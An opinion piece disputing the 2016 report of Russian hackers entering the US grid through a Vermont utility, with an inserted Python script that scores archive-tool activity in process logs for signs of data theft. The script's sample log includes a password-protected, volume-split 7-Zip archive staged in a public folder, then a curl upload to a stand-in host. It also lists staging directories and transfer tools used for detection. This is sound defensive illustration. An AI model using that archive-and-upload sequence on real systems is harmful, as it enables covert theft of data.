On December 30th, 2016, The Washington Post led with this ominous front-page headline: “Russian hackers penetrated U.S. electricity grid through a utility in Vermont, U.S. officials say.” Not only did the story spark a wave of fear and apprehension among Americans, it also prompted an avalanche of outrage and expenditure by an untold number of local, state and federal agencies.
The Post’s story was captivating and bone-chilling. If only it had been true: as it turns out, the narrative was false.
The Post’s subsequent correction was a remarkable mea culpa and merits thoughtful deconstruction.
Here is an excerpt:
The Vermont utility has now fessed up that the sole evidence of Russian hacking of the U.S. energy grid is the laptop of a utility employee that contained malware previously associated with Russian hackers. But there is still more to this developing story.
First off, as many have pointed out, the Vermont malware in question is actually available for purchase online, hardly an inculpatory indicator pointing to Russian involvement. Malware can come from anywhere, and its mere presence does not necessarily mean that Russian government hackers launched a coordinated campaign to penetrate that machine; the infection could have come from something as simple as the employee using his or her computer to visit one of the millions of compromised websites currently live and reachable with a single mouse-click.
Consider also the nebulous definition of malware: the tools or criminal programs used to penetrate and take over computer systems. In the context of a cyber-attack, malware means any program or file an attacker uses to infiltrate a computer system. Just as a legitimate hardware tool such as a screwdriver becomes a burglar’s tool when used to gain unlawful entry into a company’s headquarters, legitimate software tools can serve as malware in an attacker’s hands.
During Russian and other state-sponsored cyber-attacks, such as those conducted by an Advanced Persistent Threat (APT), intruders use stealthy, sophisticated, targeted and relentless techniques, built on carefully crafted and evolving reconnaissance: a low-and-slow approach that is difficult to detect.
Merely identifying APT malware can be tricky, let alone determining the motive and degree of success of the attacker orchestrating the intrusion. For instance, APT attackers often use large data container programs (archiving utilities, for example) to package information for exfiltration, yet those same programs have a broad range of legitimate uses. This is one way attackers hide their weaponry in plain sight.
Even when investigators can triangulate a common modus operandi among attackers, attributing a set of attack vectors to the same culprit is inherently speculative. The entire criminal design could be a ruse in which one country’s cyber gang co-opts the techniques of another country’s cyber gang to confuse investigators or dissemble.
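The dual-use problem described above, as an added example that is not part of the original piece: a small triage routine that reads constructed process-execution log lines and scores each host's archive-tool activity by context (where the archive was written, what spawned the tool, whether the archive was password-protected or split into volumes, and whether a transfer by the same user followed within a window). Host names, users, paths, timestamps, tool lists and score thresholds are all assumptions chosen for illustration, not real telemetry. The score is a heuristic, which is to say exactly the kind of educated guess the piece warns can be wrong.

```python
"""Triage of dual-use archive tools from process-execution logs.

Added example, not code from the original page.  Every host name, user,
path, timestamp, tool list and score threshold below is a constructed
assumption chosen to illustrate the point, not a real incident.
"""
import re
import ipaddress
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# "Data container" tools: legitimate on most hosts, also the usual staging
# step before exfiltration.  Constructed lists; extend for your environment.
ARCHIVE_TOOLS = {"7z.exe", "7za.exe", "rar.exe", "winrar.exe", "tar", "zip", "makecab.exe"}
PASSWORD_TOOLS = {"7z.exe", "7za.exe", "rar.exe", "winrar.exe"}   # -p / -hp = password
SPLIT_TOOLS = {"7z.exe", "7za.exe", "rar.exe", "winrar.exe"}      # -v<size> = volumes
TRANSFER_TOOLS = {"curl", "curl.exe", "scp", "bitsadmin.exe", "certutil.exe"}
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "bash", "winword.exe", "excel.exe"}
STAGING_DIRS = ("c:\\users\\public", "\\appdata\\local\\temp", "/tmp/", "/dev/shm/")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    image: str     # executable name only
    parent: str    # parent executable name
    cmdline: str


@dataclass
class Verdict:
    host: str
    score: int = 0
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Parse one pipe-delimited event: ts | host | user | image | parent | cmdline."""
    ts, host, user, image, parent, cmdline = [p.strip() for p in line.split("|", 5)]
    return Event(datetime.fromisoformat(ts), host, user, image, parent, cmdline)


def has_password_flag(ev):
    # Only for tools where -p means "password"; for tar, -p preserves permissions.
    if ev.image.lower() not in PASSWORD_TOOLS:
        return False
    return any(t.startswith(("-p", "-hp")) for t in ev.cmdline.split())


def has_volume_split(ev):
    # -v<size> splits 7z/rar output into volumes; for tar, -v is merely verbose.
    if ev.image.lower() not in SPLIT_TOOLS:
        return False
    return any(t.startswith("-v") for t in ev.cmdline.split())


def dest_is_internal(cmdline):
    """True only if every IPv4 literal in the command is private; hostnames count as unknown."""
    ips = IPV4.findall(cmdline)
    return bool(ips) and all(ipaddress.ip_address(ip).is_private for ip in ips)


def triage(lines, window=timedelta(minutes=30)):
    """Score each host's archive-tool activity by context.  Returns {host: Verdict}."""
    events = sorted((parse_line(ln) for ln in lines if ln.strip()), key=lambda e: e.ts)
    verdicts = {}
    for a in events:
        if a.image.lower() not in ARCHIVE_TOOLS:
            continue
        v = verdicts.setdefault(a.host, Verdict(a.host))
        if any(d in a.cmdline.lower() for d in STAGING_DIRS):
            v.score += 2; v.reasons.append("archive in staging directory")
        if has_password_flag(a):
            v.score += 3; v.reasons.append("password-protected archive")
        if has_volume_split(a):
            v.score += 2; v.reasons.append("archive split into volumes")
        if a.parent.lower() in INTERACTIVE_PARENTS:
            v.score += 2; v.reasons.append(f"spawned by {a.parent}")
        # Same user moving data off the host shortly after archiving it.
        for t in events:
            if (t.host == a.host and t.user == a.user
                    and t.image.lower() in TRANSFER_TOOLS and a.ts < t.ts <= a.ts + window):
                pts = 1 if dest_is_internal(t.cmdline) else 3
                v.score += pts; v.reasons.append(f"followed by {t.image} ({pts} pts)")
                break
    return verdicts


def label(v):
    return "suspicious" if v.score >= 7 else "review" if v.score >= 4 else "likely benign"


# Constructed sample telemetry (hypothetical hosts, users, paths and addresses).
SAMPLE_LOG = r"""
2016-12-30T02:00:00 | fileserver01 | root | tar | cron | tar -czpf /var/backups/home-20161230.tgz /home
2016-12-30T02:10:00 | fileserver01 | root | scp | cron | scp /var/backups/home-20161230.tgz backup@10.0.0.5:/backups/
2016-12-30T09:15:00 | ws-hr-02 | asmith | 7z.exe | explorer.exe | "C:\Program Files\7-Zip\7z.exe" a C:\Users\asmith\Documents\photos.7z C:\Users\asmith\Pictures
2016-12-30T14:02:11 | ws-finance-07 | jdoe | 7z.exe | powershell.exe | "C:\Users\Public\7z.exe" a -phunter2 -v50m C:\Users\Public\out.7z "C:\Users\jdoe\Documents\Q4"
2016-12-30T14:09:40 | ws-finance-07 | jdoe | curl.exe | powershell.exe | curl.exe -T C:\Users\Public\out.7z.001 http://files.example.net/up
"""

if __name__ == "__main__":
    for host, v in triage(SAMPLE_LOG.splitlines()).items():
        print(f"{host:14} score={v.score:2} {label(v):13} {'; '.join(v.reasons)}")
```

On the constructed input the cron-driven `tar` backup followed by an `scp` to a private address scores 1, the desktop `7z.exe` run from Explorer scores 0, and the copy of `7z.exe` run out of `C:\Users\Public` by PowerShell with a password and volume splitting, followed minutes later by an upload, scores 12. The flag checks are deliberately tool-specific because the same letters mean different things to different tools (`-p` is "password" to 7-Zip and RAR but "preserve permissions" to tar). None of this identifies who ran the tool or why; it only ranks which activity a human should look at first.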
Drawing conclusions by correlating a library of hacking techniques and targets of known cyber-attackers can provide worthwhile intelligence fodder for U.S. government investigative teams and policy-makers. However, pinpointing attribution to, and ascertaining the motives of, cyber-attackers is inherently subjective.
An online intruder can leave behind a digital crime scene akin to a ransacked home, one that seems untouched and immaculate, or something in between. Reverse engineering malware is both an art and a science, and forensic investigators, incident responders, security engineers and IT administrators employ an extensive array of practical skills to pinpoint malware that targets, accesses or otherwise infects a company’s technological infrastructure.
Above all else, the most important lesson for both the Washington Post and the Governor of Vermont: data breach response and malware reverse engineering boil down to an elaborate, albeit intelligent, guessing game, and the guesses can be wrong.